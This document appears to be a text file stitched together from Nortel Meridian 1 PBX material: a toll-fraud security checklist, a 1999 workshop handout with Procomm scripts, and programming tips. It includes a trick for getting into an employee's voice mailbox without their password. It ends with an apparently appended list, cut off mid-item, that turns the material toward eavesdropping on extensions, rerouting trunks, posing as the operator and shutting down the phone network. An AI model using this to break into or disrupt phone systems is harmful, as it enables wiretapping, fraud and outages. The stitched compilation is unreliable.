ESN signaling, if not required, should be avoided. NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block ------------------------------------------------------------------------------ ACD - Automatic Verify ACD queues and associated NCFW numbers. Call Distrobution Verify all referenced extensions. ------------------------------------------------------------------------------ DISA - Direct Remove DISA if not required. If required, verify that Inward System security codes are in use. Access ------------------------------------------------------------------------------ ESN - Electronic AC1 is typically "9". If there is an AC2 assigned, Switched Network verify its use. If TOD or ETOD is used - verify what NCOS levels are changed, when they are changed and why they are changed. Apply FLEN to your SPNs to insure nobody is ever allowed to be transferred to a partially dialed number, like "Transfer me to 91800" Study EQAR (Equal Access Restriction) to insure that users can only follow a "Carrier Access Code" with a zero rather than a one: (1010321-1-414-555-1212 is blocked but 1010321-0-414-555-1212 is allowed with EQAR) ------------------------------------------------------------------------------ NCTL - Network Use LD81 FEAT PRINT to verify all NCOS being used. Control Does NCOS 0 = FRL 0? Does NCOS X always equal FRL X in the NCTL? Does FRL 0 have any capabilities? - It should not be able to dial anything. ------------------------------------------------------------------------------ FCAS - Free Call Confirm the need to use FCAS and remove it if Screening possible. FCAS is usually a waste of system memory and complicates the system without saving money. ------------------------------------------------------------------------------ DGT (DMI) - Digit Confirm all numbers referenced in the "insert" Manipulation section of each DMI table. ------------------------------------------------------------------------------ RLB - BARS Route Are any RLB ENTR'S assigned FRL 0 - typically, only List Block the RLB that handles 911 calls should have an FRL 0. If DMI is in use, confirm all "inserted" numbers. ------------------------------------------------------------------------------ CDP - BARS Are all CDP numbers valid? Check the RLBs they point Coordinated to and see what the DMI value is. Confirm insertions. Dialing Plan ------------------------------------------------------------------------------ NET - ALL - BARS Add 000,001,002,003,004,005,006,007,008,009 as SPNs Network Numbers pointing to a route list block that is set to LTER YES. These entries block transfers to "ext. 9000" and similar numbers. Point SPN "0" to a RLI with a high FRL, then consider adding new SPNs of 02, 03, 04, 05, 06, 07, 08, 09 to point to a RLI with a lower FRL so that users cannot dial "0", but can dial "0+NPA credit card calls. Check FRL of 0, 00, 011 and confirm that each is pointed to separate NET entry requiring a high FRL. Remove all of shore NPAs (Like 1-809 Dominican Republic) if possible. Regulations are almost non-existent in some of those areas and they are hot fraud targets. Verify blocking 900 and 976 access. Also consider blocking the NXX of your local radio station contest lines. Users will go nuts calling a radio station to win a free toaster, taking over all the trunks in your phone system. Restrict the main numbers and DID range within the BARS system. There is no need to call from an outgoing to an incoming line at the same location. ------------------------------------------------------------------------------ TRUNKS Confirm that all trunks have TGAR assigned. Confirm that all incoming and TIE trunks have class of service SRE assigned. (caution on networked systems) Confirm that all trunks have an NCOS of zero. NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block ------------------------------------------------------------------------------ SETS-PHONES Does every phone have a TGAR of 1 assigned? (This must be checked set by set, TN by TN). Can you change every phone that is UNR to CTD? Review LD81 FEAT PRINT to find out the UNR sets. CTD class of service is explained below. Confirm that all sets are assigned CLS CFXD? Confirm that the NCOS is appropriate on each set. In Release 20 or above, removing transfer feature may be appropriate. Confirm that all sets CFW digit length is set to the system DN length. NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block Apply Flexible Trunk to Trunk Connections on the set, and FTOP in the CDB if deemed appropriate. These restrictions are done on a set by set basis and allow or deny the ability to transfer incoming calls out of the facility. ------------------------------------------------------------------------------ VOICE MAIL PORTS Each port should be CLS of SRE Each port should be NCOS 0 - NCOS 0 must be known to be too low to pass any call Each port should be TGAR 1 (all trunk routes must be TARG 1 also) NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block NOTE: If you are used to your Mail system doing outcalling, you can forget about that working after applying these restrictions. ------------------------------------------------------------------------------ CLASS OF SERVICE AND TRUNK GROUP ACCESS RESTRICTIONS: ----------------------------------------------------- EXPLANATION OF CLASS OF SERVICE SRE: ------------------------------------ NTP DEFINITION: Allowed to receive calls from the exchange network. Restricted from all dial access to the exchange network. Allowed to access the exchange network through an attendant or an unrestricted telephone only. Essentially, an SRE set can do nothing on it's own except dial internal and TIE line extensions. If a trunk is SRE - it will work normally and allow conference calls and transfers. EXAMPLES OF 'SRE' IN USE: ------------------------- Voice Mail cannot connect to an outgoing line, but can receive incoming calls. Callers on the far end of a TIE line cannot call out through your end (for their sake, both ends should be SRE). EXPLANATION OF CLASS OF SERVICE CTD: ------------------------------------ If a route access code is accessed (if there was no match between the TGAR and TARG), the caller cannot dial 1 or 0 as the leading digits. If the caller makes a "dial 9" BARS call, the NCOS will control the call. EXPLANATION OF TGAR AND TARG: ----------------------------- The best restriction is to have all trunk routes TARG'd to 1 and all TNs (including actual trunk TNs) TGAR'd to 1. This will block all access to direct trunk route selection. BENEFITS OF IMPLEMENTING THESE SECURITY RESTRICTIONS ---------------------------------------------------- No incoming caller will have access to an outside line unless physically transferred or conferenced by an internal party. If voice mail ports are SRE and NCOS 0 and have a TGAR matching the TARG - they will not be able to transfer a call out of the system, regardless of the voice mail system's resident restrictions assigned. No phone will be able to dial a trunk route access code. Consider allowing telecom staff this ability for testing. Layered security: ----------------- If in phone programming, TGAR was overlooked on a phone, the CTD class of service would block the user from dialing a 0 or 1 if they stumble upon a route access code. If in programming, the CTD class of service was overlooked, both TGAR and NCOS would maintain the restrictions. If in programming, the NCOS is overlooked, it will defaults to zero, which is totally restricted if NCTL and RLBs are set up correctly. Quick Tour of a Simple Meridian 1 BARS Call ------------------------------------------- Basic Automatic Route Selection. If you dial "9", you are accessing BARS. "9" is the "BARS Access Code" 1. A telephone dials "9" - BARS activates. 2. The telephone calls a number - Example: 1-312-XXX-XXXX 3. The PBX hold the digits while it looks up "1-312" to figure out what Route List to use for processing the call. 4. The Route List determines the possible trunk routes that can be used. 5. The Route List checks the facility restriction level of the telephone and compares it to its own required facility restriction level. 6. The Route List checks to see if any special digit manipulation should be performed. LD90 NET -------- The LD90 Network overlay is where area codes and exchanges are defined. If a prefix is not entered into LD90, it cannot be dialed through BARS. Each area code or exchange refers to a "Route List" or RLI which contains the instructions for routing the call. >ld 90 ESN000 REQ prt CUST 0 FEAT net TRAN ac1 TYPE npa NPA 1312 NPA 1312 <-- This is the network number (prefix) RLI 11 <-- This is the Route List that the prefix gets instruction from DENY 976 <-- This is an exchange in NPA 312 that is blocked SDRR DENY CODES = 1 DMI 0 ITEI NONE REQ end LD86 RLB (or RLI) ----------------- The RLB is a "list" of possible trunk routes that an area code or exchange can be dialed over. Each "ENTR" or list entry contains a trunk route. Each entry also has a "minimum Facility Restriction Level" or "FRL" that must be met before a phone can access that entry. In the following example, the first entry can be accessed by phones whose NCOS equals an FRL of 3 or above. The second entry can only be accessed by phones whose NCOS equals an FRL of 6 or above. Along with the trunk route and the FRL, you can apply specific "digit manipulation" with the DMI entry. The DMI entries are explained here. >ld 86 ESN000 REQ prt CUST 0 FEAT rlb RLI 11 RLI 11 ENTR 0 <-- This is the list's first "Entry Number" LTER NO ROUT 15 <-- This is the first choice Trunk Route Number TOD 0 ON 1 ON 2 ON 3 ON 4 ON 5 ON 6 ON 7 ON CNV NO EXP NO FRL 3 <-- This is the Facility Restriction Level DMI 10 <-- This is the Digit Manipulation Index Number FCI 0 FSNI 0 OHQ YES CBQ YES ENTR 1 <-- This is the list's second "Entry Number" LTER NO ROUT 9 <-- This is the second choice Trunk Route Number TOD 0 ON 1 ON 2 ON 3 ON 4 ON 5 ON 6 ON 7 ON CNV NO EXP YES <-- This is considered the "expensive" choice FRL 6 <-- Note that the Facility Restriction Level is higher DMI 0 <-- Note no digit manipulation is required for this trunk route FCI 0 FSNI 0 OHQ YES CBQ YES ISET 2 MFRL 3 REQ end LD87 NCTL --------- The FRL to NCOS "relationship" is built in the NCTL data block. The FRL and the NCOS do not necessarily have the equal one another, however they usually do. A higher FRL/NCOS has more capability than a lower FRL/NCOS. For an NCOS number to have any capability, it must first be defined in the NCTL data block. >ld 87 ESN000 REQ prt CUST 0 FEAT nctl NRNG 0 7 <-- Range from NCOS 0 through 7 was requested SOHQ NO SCBQ YES CBTL 10 --------------- NCOS 0 EQA NO FRL 0 RWTA NO NSC NO OHQ NO CBQ NO MPRI 0 PROM 0 --------------- NCOS 1 EQA NO FRL 1 RWTA NO NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT I RADT 0 SPRI 0 MPRI 0 PROM 0 --------------- NCOS 2 EQA NO FRL 0 RWTA NO NSC NO OHQ NO CBQ NO MPRI 0 PROM 0 --------------- NCOS 3 EQA NO FRL 3 <-- NCOS 3 equals FRL 3. RWTA YES NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT I RADT 10 SPRI 0 MPRI 0 PROM 0 --------------- NCOS 4 EQA NO FRL 4 RWTA YES NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT A RADT 10 SPRI 0 MPRI 0 PROM 0 --------------- NCOS 5 EQA NO FRL 5 RWTA NO NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT A RADT 10 SPRI 0 MPRI 0 PROM 0 --------------- NCOS 6 EQA NO FRL 6 <-- NCOS 6 equals FRL 6. RWTA NO NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT A RADT 0 SPRI 0 MPRI 0 PROM 0 --------------- NCOS 7 EQA NO FRL 7 RWTA NO NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT A RADT 0 SPRI 0 MPRI 0 PROM 0 TOHQ NONE LD86 Digit Manipulation ----------------------- The Digit Manipulation data blocks are where special prefixes are entered before numbers are sent out over trunks. An example of digit manipulation is where a 1010XXX carrier access code must be inserted before a number is processed over a trunk. REQ prt CUST 0 FEAT dgt DMI 10 DMI 10 <-- This is simply the index number. DEL 1 <-- This says "delete the first digit after "9" CTYP NCHG REQ prt CUST 0 FEAT dgt DMI 3 DMI 3 DEL 0 <-- This says "delete nothing after 9" INST 101288 <-- This says "Insert 101288 after 9 and before the actual number dialed" CTYP NCHG REQ end Telephone --------- This is simply a telephone's data block DES 5135 TN 004 0 14 00 TYPE 500 CDEN 4D CUST 0 DN 5135 MARP CPND NAME Typical User XPLN 9 DISPLAY_FMT FIRST,LAST AST NO IAPG 0 HUNT TGAR 1 LDN NO NCOS 5 <-- What FRL does this equal? SGRP 0 RNPG 0 LNRS 16 XLST SCI 0 CLS CTD DTN FBD XFA WTA THFD FND HTD ONS LPR XRA CWD SWD MWA LPD XHD CCSD LNA TVD CFTD SFD C6D PDN CNID CLBD AUTU ICDD CDMD EHTD MCTD GPUD DPUD CFXD ARHD OVDD AGTD CLTD LDTA ASCD MBXD CPFA CPTA DDGA NAMA SHL ABDD CFHD USRD BNRD OCBD RCO 0 PLEV 02 FTR CFW 4 DATE 28 NOV 1978 LD86 ESN - the Start of BARS ---------------------------- The ESN data block is the root of BARS. Before BARS can be set up, the ESN data block must be defined. >ld 86 ESN000 REQ prt CUST 0 FEAT esn MXLC 0 MXSD 30 MXIX 0 MXDM 100 MXRL 80 MXFC 60 MXFS 0 MXSC 120 NCDP 4 AC1 9 <-- This is where "9" is defined AC2 DLTN YES ERWT YES ERDT 0 TODS 0 00 00 23 59 <-- This section refers only to time of day routing controls RTCL DIS NCOS 0 - 0 <-- This section refers only to time of day routing controls NCOS 1 - 1 NCOS 2 - 2 NCOS 3 - 3 NCOS 4 - 4 NCOS 5 - 5 NCOS 6 - 6 NCOS 7 - 7 NCOS 99 - 99 ETOD TGAR NO REQ end ISLUA 99 Session BA 20 Capturing Data From Your Meridian 1 to Various PC Software Packages Curt Kempf City of Columbia, Missouri Thanks for attending the workshop I hope you find this information helpful ======================================== o ACD Daily Report o Procomm Plus Script to capture ACD reports to disk. Format: MMDDYY.TXT o TN PRT out of Host MCA card o Procomm Script to CHG a TN when it becomes IDLE o Procomm Script to CHG/NEW a list of DNs and their NAMES (LD 95) o Procomm Script to monitor PBX for "DTA0021", "INI0", "PWR01", then send an alpha numeric page when received. ACD Daily Report ================ ACD 000 1999 03 29 17:00 DAILY TOTALS REPORT REPT 1 ACD AVG CALLS AVG AVG AVG AVG DN AVG #-XFER AVG-TIME-POSN DN AGTS ANSWD ASA DCP PCP WORK WAIT CALLS TIME IDN ACD BUSY MANNED 7380 324 54 125 388 514 127 118 69 0 28 22085 27246 ------------------------------------------------------------------------------ 1 324 54 125 388 514 127 118 69 0 28 22085 27246 REPT 2 ACD CALLS RECALL ANSWERED ABANDONED TOF TOF OVER INTER DN ACCPTED TO LONGEST NO. AVG.WT TSF IN OUT FLOW FLOW SOURCE WT. TIME BUSY 7380 366 0 476 43 88 80 0 0 8 0 ------------------------------------------------------------------------------ 1 366 0 476 43 88 80 0 0 8 0 REPT 4 POS CALLS AVG AVG AVG DN INC DN OUT #-XFER BUSY MANNED ID ANSWD DCP PCP WAIT INC TIME OUT TIME IDN ACD TIME TIME ACD DN 7380 301 81 136 115 142 3 66 12 352 0 9 20716 32208 303 57 91 261 139 4 478 15 652 0 4 20788 28702 309 49 90 2 182 0 0 1 100 0 7 4550 13466 304 87 128 127 108 1 60 12 564 0 6 22662 32088 305 39 185 108 73 0 0 2 96 0 1 11464 14302 308 0 ***** ***** ***** 15 1770 20 1464 0 0 32256 32400 306 0 ***** ***** ***** 9 2950 13 1660 0 0 32400 32400 312 11 145 2686 50 4 286 7 416 0 1 31848 32400 ------------------------------------------------------------------------ 8 324 125 388 127 36 93 82 88 0 28 2945 3633 Procomm Plus Script to capture ACD reports to disk. Format: MMDDYY.TXT ==================================== ; ProComm script by Chris Fourroux & Curt Kempf/City of Columbia - tested ; with ProComm Plus 32 95/NT, version 4. Script to caputure ACD reports to ; disk with the format XXXXXX.txt, where XXXXXX is month day year. Script ; waits for "ACD DN 7380" to occur, which is on every hourly report, then ; closes and appends the newest statistics to MMDDYY.TXT file. string cmd="ncopy c:\capture\" string szFileName = $DATE string szDate = $DATE integer Pos = 0 proc main dial data "Option 61" set capture overwrite OFF ; if capture file exists, append data to it. capture off ; close capture file if it is open when TARGET 0 "ACD DN 7380" call CLOSECAP Startloop: clear ; clear contents of screen and scroll back buffer szFileName = $DATE szDate = $DATE while 1 if nullstr szFileName ; Check to see if we've reached exitwhile ; the end of source string endif ; and if so, exit loop. if strfind szFileName "/" Pos ; Check for char strdelete szFileName Pos 1 ; and delete it else exitwhile ; exit if no more characters endif endwhile strcat szFileName ".txt" set capture file szFileName ; Set name of capture file. capture on ; Open up the capture file. while strcmp $DATE szDate ; Loop while date is the same endwhile ; or if the date changes, capture off ; Close the capture file. goto Startloop ; and start a new one. endproc proc closecap pause 3 strcat cmd szFileName ; Append to variable "CMD" strcat cmd " h:\uab\" ; Append network drive to "CMD" transmit "^M***********^M" ; Put in asteriks between hourly reports capture off ; Close capture file pause 5 DOS cmd HIDDEN i0 ; Run "CMD" in DOS and copy file to the LAN pause 10 taskexit i0 ; Exit DOS window pause 10 cmd="ncopy c:\capture\" ; Reset "CMD" capture on ; Turn Capture back on. Endproc Procomm Screen of dialing up the host MCA card(direct connect 9600 baud) ===================================== ENTER NUMBER OR H (FOR HELP): 2206 CALLING 2206 RINGING ANSWERED CALL CONNECTED. SESSION STARTS logi PASS? TTY #02 LOGGED IN 08:59 11/4/1999 > TN PRT out of Host MCA card DES 2206 TN 020 0 04 31 ;note TN is TN of voice set(20 0 4 15) +(plus) 16 TYPE 2616 CDEN 8D CUST 0 AOM 0 FDN TGAR 1 LDN NO NCOS 2 SGRP 0 RNPG 0 SCI 0 SSU XLST SCPW CLS CTD FBD WTD LPR MTD FND HTD ADD HFD MWD AAD IMD XHD IRD NID OLD DTA DRG1 POD DSX VMD CMSD CCSD SWD LND CNDD CFTD SFD DDV CNID CDCA ICDD CDMD MCTD CLBD AUTU GPUD DPUD DNDD CFXD ARHD FITD CLTD ASCD CPFA CPTA ABDD CFHD FICD NAID DDGA NAMA USRD ULAD RTDD PGND OCBD FLXD FTTU TOV 0 MINS DTAO MCA PSEL DMDM HUNT PSDS NO TRAN ASYN PAR SPACE DTR OFF DUP FULL HOT OFF AUT ON BAUD 9600 DCD ON PRM HOST ON VLL OFF MOD YES INT OFF CLK OFF KBD ON RTS ON PLEV 02 AST IAPG 0 AACS NO ITNA NO DGRP DNDR 0 KEY 00 SCR 2206 0 MARP 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 DATE 30 DEC 1997 Very rarely, I can not dial up the host MCA card. It simply won't answer, so the following usually clears it up: ITEM ITEM OPE YES DCD ON PRM OFF If that doesn't work, since 020 0 04 31 is "digital", it could be disabled. LD 32 and ENLU it. Procomm Script to CHG a TN when it becomes IDLE =============================================== string TN ;TN string TIPE ;TYPE, however word is reserved in ASPECT string EYETEM ;ITEM, ditto above. string szList ;List of items. string szItem ;Item selected from list. integer Event ;Dialog box event. integer Num ;integer value proc MAIN set txpace 50 ;delay for keyboard when TARGET 0 "IDLE" call CHGIT ;when receive IDLE, go change set. ;Input the TN, TYPE, and ITEM sdlginput "LD 11, CHG when IDLE :-)" "Enter TN: " TN if strcmp TN "" ; compare to see if NULL? halt ;if enter is pressed, halt script. else endif ; Display dialog box with list of items. ; Pick if set is a 500, 2008, or 2616 szList = "2616,2008,500" dialogbox 0 55 96 100 74 11 "LD 11, CHG when IDLE :-)" listbox 1 5 5 90 40 szList single szItem pushbutton 2 28 52 40 14 "&Exit" ok default enddialog while 1 dlgevent 0 Event ; Get the dialog event. switch Event ; Evaluate the event. case 0 ; No event occurred. endcase case 1 if strcmp szItem "2616" tipe = "2616" else if strcmp szItem "2008" tipe = "2008" else if strcmp szItem "500" tipe = "500" endif endif endif endcase default ; Exit case chosen. exitwhile endcase endswitch endwhile dlgdestroy 0 CANCEL ; Destroy the dialog box. sdlginput "LD 11, CHG when IDLE :-)" "ITEM: (IE: CLS HTA)" EYETEM Transmit "LD 11^M" ;Go in to overlay 11 Waitfor "REQ" for Num = 0 upto 100 ;Keep STAT'n til IDLE Transmit "STAT " Transmit TN Transmit "^M" pause 10 ; wait 10 seconds endfor endproc PROC CHGIT Transmit "CHG^M" ;Go change the set, then halt the script. Waitfor "TYPE" Transmit TIPE pause 1 ;pause 1 second Transmit "^M" Waitfor "TN" Transmit TN Transmit "^M" Waitfor "ECHG" Transmit "YES^M" Waitfor "ITEM" Transmit EYETEM Transmit "^M" waitfor "ITEM" transmit "^M" Waitfor "REQ:" Transmit "END^M" halt endproc Procomm Script to CHG/NEW a list of DNs and their NAMES (LD 95) =============================================================== integer flag=0 ;set flag proc main set txpace 100 ;delay for keyboard when TARGET 1 "SCH2115" call LD95NEW ;wait for 'name does not exit' error ;open text file that has a list of ;DNs & NAMEs you want to change/add. fopen 1 "C:\phone\chgnames.txt" READ ;chgnames.txt it in the format of ; 7354, Jane Doe ; 6745, John Smith ; 7645, Dan White ;script doesn't care if the NAME is NEW or CHG J if failure usermsg "could not open the file." else Transmit "LD 95^M" ;Go in to overlay 95 Waitfor "REQ" Transmit "CHG^M" Waitfor "TYPE" Transmit "NAME^M" Waitfor "CUST" Transmit "0^M" Waitfor "DIG" Transmit "^M" fseek 1 0 0 while 1 fgets 1 s0 if FEOF 1 exitwhile endif strtok s1 s0 "," 1 strtok s2 s0 "," 1 DelStr (&s1) DelStr (&s2) DelLineFeed (&s2) ;strfmt s4 "TN: %s" s1 ;uncomment these two for ;usermsg s4 ;troubleshooting the script strlen s1 i0 if (i0 > 2) LD95CHG () else Transmit "****^M" halt endif endwhile endif endproc proc LD95CHG Waitfor "DN" Transmit s1 Transmit "^M" pause 1 if FLAG==1 FLAG=0 Transmit "^M" return else Transmit s2 Transmit "^M" Waitfor "DISPLAY_FMT" endif endproc proc LD95NEW FLAG=1 Transmit "^M" Transmit "**^M" Waitfor "REQ" Transmit "NEW^M" Waitfor "TYPE" Transmit "NAME^M" Waitfor "CUST" Transmit "0^M" Waitfor "DIG" Transmit "^M" Waitfor "DN" Transmit s1 Transmit "^M" Waitfor "NAME" Transmit s2 Transmit "^M" Waitfor "DISPLAY_FMT" Transmit "^M" Waitfor "DN" Transmit "^M" Waitfor "REQ" Transmit "CHG^M" Waitfor "TYPE" Transmit "NAME^M" Waitfor "CUST" Transmit "0^M" Waitfor "DIG" endproc proc DelStr param string szStr integer Pos while 1 if StrFind szStr "`"" Pos StrDelete szStr Pos 1 else exitwhile endif endwhile endproc PROC DelLineFeed param string szStr integer Pos strlen szStr Pos if (Pos > 2) StrDelete szStr (Pos-1) 1 endif endproc You could very easily modify this script to say, change an ASCII list of TNs /TYPEs to TGAR 1, and have it executed at 2:00 a.m. The s0 and s1 variables would change from DN & NAME, to TN & TYPE, and add Waituntil "2:00:00" "7/16 /99" to kick it off at 2:00 a.m. Procomm Script to monitor PBX for "DTA0021", "INI0", "PWR01", then send an alph numeric page when received. ======================================================================= proc Main #DEFINE pagernum "235.5334" ;Enter your pager number here. string szName="OPT61.cap" ;Name of text file to capture to. string passw when TARGET 1 "DTA021" call DTA021 ;what do you want to 'wait for' ? when TARGET 2 "INI0" call INI0 when TARGET 3 "PWR01" call PWR0 set capture file szName capture on set txpace 150 ;delay for keyboard HANGUP Dial DATA "MCA" transmit "^M" waitfor "HELP):" transmit "2206^M" waitfor "SESSION STARTS" while $CARRIER transmit "****" pause 1 transmit "LOGI^M" waitfor "PASS?" sdlginput "Security" "Password: (all caps!)" passw MASKED if stricmp passw "sss" ;to bypass logging in. transmit "*" call loggedin endif transmit passw transmit "^M" pause 2 endwhile set txpace 1 endproc proc DTA021 pageA() ;dial paging provider TRANSMIT "Digital Trunk Diagnostic. Frame alignment persisted for 3 seconds^M" ;send specific x11 error to pager pageB() ;end connection to provider mcacard() ;connect back to Option 61 endproc proc INI0 pageA() TRANSMIT "An initialization has taken place.^M" pageB() mcacard() endproc proc PWR0 pageA() TRANSMIT "Power failure from power and system monitor.^M" pageB() mcacard() endproc proc mcacard HANGUP PAUSE 2 Dial DATA "MCA" ;Connect up to option 61 through MCA card. while $DIALING endwhile transmit "^M" pause 1 transmit "^M" waitfor "HELP):" transmit "2206^M" waitfor "SESSION STARTS" pause 1 when RESUME call loggedin loggedin() endproc proc loggedin while $CARRIER ;wait for errors to occur. Continue to do your MACs etc.. endwhile endproc proc pageA when SUSPEND set port dropdtr on pause 1 hangup ;hangup Option 61 connection pause 2 hangup ;release mca card from COM port set port dropdtr off pause 1 Dial DATA "TriStar" ;Dial your paging provider while $DIALING endwhile TRANSMIT "^M" ;TAPI protocol, M puts in manual mode. WAITFOR "ID=" TRANSMIT "M^M" WAITFOR "Enter pager" TRANSMIT pagernum TRANSMIT "^M" WAITFOR "Enter alpha" endproc proc pageB TRANSMIT "^M" WAITFOR "More Pag" TRANSMIT "^M" pause 2 endproc Little Known Meridian 1 Features And Programming Tricks ======================================================= HELP and Error Lookup HELP - Type " ? " at many prompts LOOKUP - At " > " sign, type ERR AUD028 to find out what AUD028 indicates. At any other prompt, type " ! ", then you will receive " > " symbol for getting ERR lookup. Find Sets with a Certain Feature ================================ LD81 REQ LST FEAT CFXA FEAT UNR Lists all sets that have the "Call Forward External Allow" feature, then lists all UNR sets. Inventory and Identification Commands ===================================== LD32 IDU l s c u (or) IDC l s c LD22 CINV (and) ISSP LD30 UNTT l s c u Speed Call Stuff ================ Create many Speed Call lists at once. LD18 REQ: NEW 100 - Creates 100 lists. When memory is plentiful, make Speed Call list number the same as the persons DN. Need to increase MSCL in LD17 Find a "Controller" in LD81 by: REQ:LST, FEAT:SCC, then the Speed List Number Allow Restricted Sets to Dial Certain Long Distance Numbers. ============================================================ Add the numbers to a System Speed Call List. Assign an NCOS to the "List" that replaces the users NCOS during the call. Alternate: Add the suffix of the telephone number to an ARRN list in the prefixes RLI. This will point only that number to a new RLI with a lower (or higher if you choose) FRL. Look up ARRN in LD86 PBX Clock Fast or Slow? ======================= LD2 SDTA X Y -- x y X = 0 for "subtract time each day" -or- 1 for "add time each day" Y = 0-60 seconds to be added or subtracted each day. Daylight Savings Question? TDST Look this one up in LD2 before changing Phantom DNs, TNs, and "MARP to Voice Mail" TNs ============================================== Phantom TN with FTR DCFW ACD Queues with NCFW but no Agents 2616 Sets with AOMs (AOMs can be in "software", but do not need to be "installed" on the set). This is an excellent "MARP TN" for DNs that need to HUNT/FDN to Voice Mail Digit Display on Trunk Routes and ACD Queues ============================================ Find Trunk Route Access Codes - name in LD95 like any other DN ACD Numbers - name in LD95 like any other DN IDC Numbers - name in LD95 at DCNO prompt. Limited Access Passwords ======================== Print PWD in LD22 before starting LD17 LAPW 01 PW01 12345 OVLA 10 11 20 Identify Trunks, Routes and TTY Ports with "DES" Entry ====================================================== LD17 ADAN DES can be 1-16 characters LD16 RDB DES can be 1-16 characters LD14 TRK DES can be 1-16 characters TKID - enter telephone number Free Up or Block DN Range ========================= Change your SPRE Code to 4 digits LD15 - SPRE XXXX Assign all current feature codes as Flexible Feature Codes To hide DNs from appearing in LUDN printouts, enter DN prefix ranges as an FFC for "Ring Again Activate" Save "Call Forward" Status upon Reload/Sysload ============================================== LD17 CFWS YES Call Waiting "Buzz" on Digital Sets is Not Long Enough ====================================================== Turn on Flexible Incoming Tones Allowed LD15 OPT SBA DBA LD 11 CLS FITA "DSP" Display Key Applications ============================== Youre on the phone, another call comes in...Press DSP, then ringing line to see whos calling. Press DSP, then Speed Call, then entry number to view entries. Rls23 Update - automatic Display CLS TDD NHC - No Hold Conference ======================== With NHC, other party is not placed on hold while adding conferees. You can also disconnect conferee called with NHC LD11 KEY X NHC Rls23 Update - Conf. Display/Disconnect LD11 CLS CDCA Call Forward Indication on 2500 Sets ==================================== Add Call Forward Reminder Tone. Special dial tone is heard only when call forwarded. LD15 OPT CFRA Override Call Forwarded Phone ============================= Add Flexible Feature Code for "CFHO". Dial CFHO code, then dial extension. LD57 CODE CFHO On sets needing ability to perform override CLS CFHA Call Forward ONLY Internal Calls - Let Externals Ring ===================================================== Great when you need to prioritize external callers. LD11 KEY X ICF 4 ZZZZ "Delayed" Ring on Multiple Appearance DNs ========================================= Non-ringing (SCN) keys will ring after a certain duration. Great for areas where many of the same DNs appear. LD11 DNDR X (X = 0-120 seconds of delay before SCN keys will start to ring) Audible Reminder of Held Calls ============================== Receive "buzz tone" every X seconds to remind user that call is on hold. Also reminds user that Conference/Transfer was mishandled - call was never transferred LD15 DBRC X (X = 2-120 seconds between reminders) LD11, CLS ARHA Which Call "On Hold" is Mine ============================ Exclusive Hold sets held calls to "wink" at holding set, but stay "steady" at other sets. LD10/11 CLS XHA Change Ring Cadence/Tone ======================== There are 4 ring styles, adjusted in the CLS of the digital set. LD11 CLS: DRG1 -or- DGR2 -or- DRG3 -or- DRG4 Set pesky customer phones to DRG4 ! BFS - Nightmare in Shining Armor ? ================================== BFS Keys allow the user to monitor the Call Forward and busy status of a set, activate and deactivate Call Forward, and can be used as an Autodial key. NOTE: Cannot perform MOV command with BFS. User can also forward sets by accident. LD11 Key XX BFS l s c u (target sets TN) More Than 4 DNs Answered by One Mailbox? ======================================== Add up to 3 DNs to DN list in mailbox programming. Add 4th and all additional DNs in "Voice Service DN" (VSID) Table and set to "EM" to the mailbox. 1 Single LineTelephone, 3 DNs, 3 Users, 3 Mailboxes? How? ========================================================= Create one 2500 set with one of the three DNs. Create 2 Phantom TNs, each one with a new DN and DCFW each of them to the 2500 sets DN (from above) Add the three mailboxes…now any of the three numbers will ring the one set, but messages will be separated! Change An NCOS After Hours ========================== Here's an excerpt from the LD86 ESN data block that has NCOS 3 & 4 change to NCOS 2 after 4:30PM and all day on weekends AC1 9 AC2 DLTN YES ERWT YES ERDT 0 TODS 0 06 00 16 29 7 00 00 05 59 7 16 30 23 59 RTCL YES NCOS 0 - 0 NCOS 1 - 1 NCOS 2 - 2 NCOS 3 - 2 NCOS 4 - 2 NCOS 5 - 5 Oops..the Console Went Into NITE...During the DAY! ================================================== Use NITE entries that are based on "Time of Day". See Night Service in Features Book If the console goes into NITE during the day, send them to either a set of DNs next to the console, or a voice menu/thru-dialer explaining that there are "technical difficulties". After hours, NITE calls goes to where they should. Just Two Security Tricks ======================== Create SPNs in BARS of: 000 thru 009 and create a Route List Block for them with LTER=YES Now when Phreakers ask for extn 9000, they get nobody. Use the FLEN entry on SPNs 0, 00, 011 so that nobody can transfer a caller to 9011, 90, etc. Break Into Meridian Mailbox? ============================ Simply make the mailbox "Auto-logon". For remote access, add their DN to your set. Convenient if you need to access an employees mailbox without changing their password. Useful for modifying greetings of an absent employees or allowing a temporary employee access to a mailbox without divulging the regular employees password. Tracing Phone Calls =================== TRAC 0 XXXX (X=extension) TRAC l s c u TRAC l s c u DEV (Adds BARS info) TRAT 0 X (X=Console number) TRAD (see book, traces T1 channels) ENTC (see book, traces TN continuously - up to 3 TNs at a time ! ) Forgot your M3000 Directory Password? ===================================== LD32 CPWD l s c u Another Idea ============ Use a PC to log into your PBX, then activate the "capture file". Now run a TNB and keep it as a file rather than on paper. If your TNB file is large, try a high power text editor, which can open even 20meg files in seconds. Search the Internet "Text Editor" Keep copies so you can go back and see how a set was programmed when you out it by mistake. */ Using the above information you could sucessfully do the following: a) Setup your own trunk configurations that allow outgoing calls. b) Reset lines and trunks, reconfugure lines and trunks. c) Set an internal extension(s) to share the same multiplexed trunk as you so you can effectivly listen in on any incomming/outgoing phone call made on that extension. d) Set up calls that don't exist with no trunk assignment. e) Set any users voicemail box with auto-logon paremters temporarily. f) Close down the entire network g) Set every phone in the company to ring forever... h) Re-route incomming/outgoing trunk calls to any destination. i) Park your own incomming line as "on console" so you can answer calls made to a pre-set extension. j) Make yourself the company oprtator. k) Trace phonecalls, audit logs etc. l) Set all trunks to loopback on one another. m) 